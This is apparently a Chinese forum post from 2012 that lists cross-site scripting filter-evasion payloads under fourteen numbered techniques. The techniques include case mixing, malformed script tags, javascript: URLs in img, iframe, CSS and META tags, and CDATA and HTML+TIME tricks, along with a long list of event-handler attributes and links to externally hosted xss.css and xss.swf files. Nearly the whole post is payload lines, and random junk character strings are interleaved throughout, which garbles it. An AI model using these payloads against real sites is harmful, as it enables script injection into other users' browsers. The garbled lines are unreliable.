1. 改变字符大小写
4 u6 _0 r3 d9 e0 f n( o; I- n. D) Y- T! X/ K5 c/ [
: C+ I! d& R& f6 X' t
4 W7 ?1 _& ?8 \ <sCript>alert(‘d’)</scRipT>
+ H* \. Q: V6 H; d# l! v3 B, P
" Q5 ]7 o( |' c+ r& K& B2. 利用多加一些其它字符来规避Regular Expression的检查
7 v/ v8 o. X: z1 E' Z6 q: J7 y* ` q7 B2 D2 m$ V$ r: U9 i& ]
<<script>alert(‘c’)//<</script>0 j, }. u6 B! d5 }* a
% Y6 P: |* K c) G% H
<SCRIPT a=">" SRC="t.js"></SCRIPT>
# Q" {5 `- w) J% Q: Z3 @ _$ c8 e7 ~* j, f; l1 {( [" {
<SCRIPT =">" SRC="t.js"></SCRIPT>
" [" q9 N3 G6 W" |9 f* O2 ] h7 K, G9 z+ N
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>& }, C# ]- C7 v- d8 X, p; H, j
6 q; h9 w4 V W( g: f5 q6 t2 {
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>, D/ p. C& h) U* |
0 |6 M" S+ U2 g
<SCRIPT a=`>` SRC="t.js"></SCRIPT>+ R8 _5 T5 O: B/ t1 e5 F! ^) t
6 f7 k! {" j! m) J8 C. X" S. r4 I
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>' }8 y I1 `. L' w6 R5 h
6 J; K( F+ [% ?$ Q) ^
3. 以其它扩展名取代.js6 t' N2 P' ^( J1 o
( r& M' h0 y! A, w, Y5 s
<script src="bad.jpg"></script>& {- t$ z$ L& ?! t
+ w7 g3 E7 L! N. r" ` ]3 e
4. 将Javascript写在CSS档里, ?, D; v2 [4 T* i x3 k
9 N- f% Z5 W/ o" {. d1 Z4 G* v0 s <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">( t/ L) l" B, N9 }% P
$ F% n% G1 s* K$ p4 V o example:( {) X: c! J- ^" |7 d
1 M: @/ c5 ~" l9 m body {
* D& {8 f0 V7 i# `' M; }* c4 L; [
background-image: url(‘javascript:alert("XSS");’), P- B$ L/ f+ i0 B: d7 @: Y/ Z k
4 d) { ?* p! u0 p* Y7 o* u }
5 M" I% S% L7 |% e
8 R& p$ }9 X/ w3 R: K* ]( _4 E5. 在script的tag里加入一些其它字符
& N6 l" z1 _" A. J1 r
. I! |' W: S7 p) K' I <SCRIPT/SRC="t.js"></SCRIPT>
% y' @% ~/ d3 Z4 a) |. }8 l0 J2 L4 a$ ?. s& O
<SCRIPT/anyword SRC="t.js"></SCRIPT>
+ b( v- e8 F# y' l4 u
* R" W- x: x( K- ~3 ?. h$ D6. 使用tab或是new line来规避
& }. ^ k- ]9 w' a# s) Z% p/ g! K' X" a F* ?& R/ a
<img src="jav ascr ipt:alert(‘XSS3′)">
; K1 d4 D6 J) ^ a9 k* P+ g# Z. f4 r+ W( j3 b: { [
<img src="jav ascr ipt:alert(‘XSS3′)">5 N0 J3 b8 ?5 J4 I* |
3 Q9 C# W7 C1 o$ h- a <IMG SRC="jav ascript:alert(‘XSS’);">
8 w% e! }& H4 t( G$ W* J: x4 p7 F. q& ]' ~, y f- ~2 n( }
-> tag
6 \$ p% u; P. C+ ?
# ]0 t1 Y( n) L4 |! i7 {$ | -> new line
' ~# b; J, P: D' C2 N! ? Y7 Q3 Q4 g8 U: q, M5 @( `: ^8 A) J
7. 使用"\"来规避) R5 O S: a5 m6 o7 W+ N# \, \
' x' r/ ?' F$ }4 G& t7 f <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
7 m5 _; B! a# e$ \ n! m
4 D J; T& B0 D& w8 b! `5 T. ^- ? <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
% J4 O- C% o, K4 Z4 f2 Y* _
1 o4 a! n2 n3 D( N0 K" A <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">( r7 z# c$ D2 l0 T+ p6 j! k
9 s" S/ W) w- t# q
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
8 p9 Z4 ^! g7 s% @3 Q8 c
1 s5 {* ?6 @$ f# y( p <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
+ |- |% J6 z1 t% j, @; i/ h! P& T* e( V4 m( l) e9 ]
8. 使用Hex encode来规避(也可能会把";"拿掉)
' U( ~* X& J! {1 E" R8 T( A: g. K7 b+ ]' O6 {. }, n+ i
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">0 Q+ a3 S' J8 M: P; d
0 b: t/ ]( E% S% W
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
& }, b3 j; D% C! t3 E9 j9 w
* z! q& [ q* w/ n5 { <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
* ?7 L5 l3 V5 G/ |. _/ K4 s8 j ^! p/ r: M% b6 U
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">3 L3 ]9 H* ~/ Z
* f) f: u. m8 S: p9 @9. script in HTML tag
. z2 H* i: f3 d- Z6 e0 p8 p9 s* P9 Q. @6 }, F$ O5 t
<body onload=」alert(‘onload’)」>
y' [) T4 j. u/ d% Q# q% E; I* D5 a" b) @! W
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
% Y$ D# e# P. v% ]3 F4 Q3 c
4 D$ r) Z) w7 p* ~8 P, S10. 在swf里含有xss的code
& K8 q% j. R9 \. T j0 W" h, ^8 B
9 O- b- b/ l. U <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
6 d0 k8 [& y z3 Z3 u6 B* j7 ~( i a+ M4 C8 }; n3 C
11. 利用CDATA将xss的code拆开,再组合起来。
! m5 i. @* Q# q
, S: A4 i# }) D }5 E1 b1 S* \ <XML ID=I><X><C>
* @1 z1 X. u* c# f7 a9 P3 ^1 `
" b9 Q) y+ I8 b; R; G6 p. F <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
{; y" I9 D. x2 c& g t/ b3 W% ?1 U7 U# r1 c3 M9 x
</C></X>2 u: t9 z1 b5 `! r
, p3 g) v, w& ]1 N* b </xml>5 d+ \& z! \6 d' g2 t
* b1 D2 O, H( k% n <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN># x0 `: t O/ x' T* l% `! S
$ Z; e2 M" N, Q. U- `8 O) c <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>' a" n. \# i Z8 [2 T3 q; D
8 z% k k- j0 m4 W; P* y
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> A+ `' o) a% q, J) _. f4 f% _
6 N" g$ J; w' X
12. 利用HTML+TIME。
0 o, o( J" E- q9 g! O
8 N$ z+ n- N4 ]/ U: ]7 A1 e <HTML><BODY>
7 M+ O- M+ ]3 Z# ?/ E, p% h% Z# C6 u' ^+ b) O' W
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
9 P, P, P" ?+ ]( W+ g% V; L4 u$ v6 u o* D
<?import namespace="t" implementation="#default#time2">
" [3 F0 y( u. j
) q/ }, _& @; t3 ]& B. E$ b <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">9 c! ^2 {( x7 ]! N0 X8 N
% o! |( \$ ]% W7 V- S </BODY></HTML>) \1 u# k, R/ e3 O
% z9 k" o! s( O: h5 p
13. 透过META写入Cookie。! C, }2 j9 p& ?
0 K0 @' j, x/ e1 u. y1 h
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
( R; u0 f ?6 f+ F2 o8 e) a3 g: k% x! w q* W6 q
14. javascript in src , href , url
% |/ P! H6 ^" H5 a% q' f( b) Q9 Q% {
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
. i2 @ A, U: x+ o P) y0 u( _# a; r R% C
<img src="javascript:alert(‘XSS3′)">
! l! `8 K2 ` s# l! t0 S) C- n5 J j3 ]1 {" h7 P
<IMG DYNSRC="javascript:alert(‘XSS20′)">1 k. w) {9 O2 V% d9 o2 p2 k) w
( o3 K2 Y* o5 t( m' _( x) @ <IMG LOWSRC="javascript:alert(‘XSS21′)">
4 C2 B" D5 D( b( O1 h$ C7 L/ P& g+ t, s4 e) N6 S+ x
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">* G" {6 g& r' M1 \/ J( H" V4 T8 P
: [& D6 t7 H1 M7 r' P3 x
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
# m( U8 K V2 n; y2 P2 t; e9 _$ F5 W- C/ b
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">* t- i5 |, t. `& o( i/ M
) b: ^% `( r! A; x5 E
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))"># t: s" I m* B6 r2 ^) E
- f/ Z) w) z! D
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}/ \- r. R+ u: t0 f3 L; U& h
( L( p- K/ h! _7 z& E2 \
</STYLE><A CLASS=XSS></A>% D( u1 Y2 S k& i/ l
$ p1 U- I. f2 I% o, w V4 X
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
. J- q& a+ n; [: E7 [5 z7 x7 [/ J" R! l2 V @
|
发表于 2012-12-31 09:59:28
收藏
支持
反对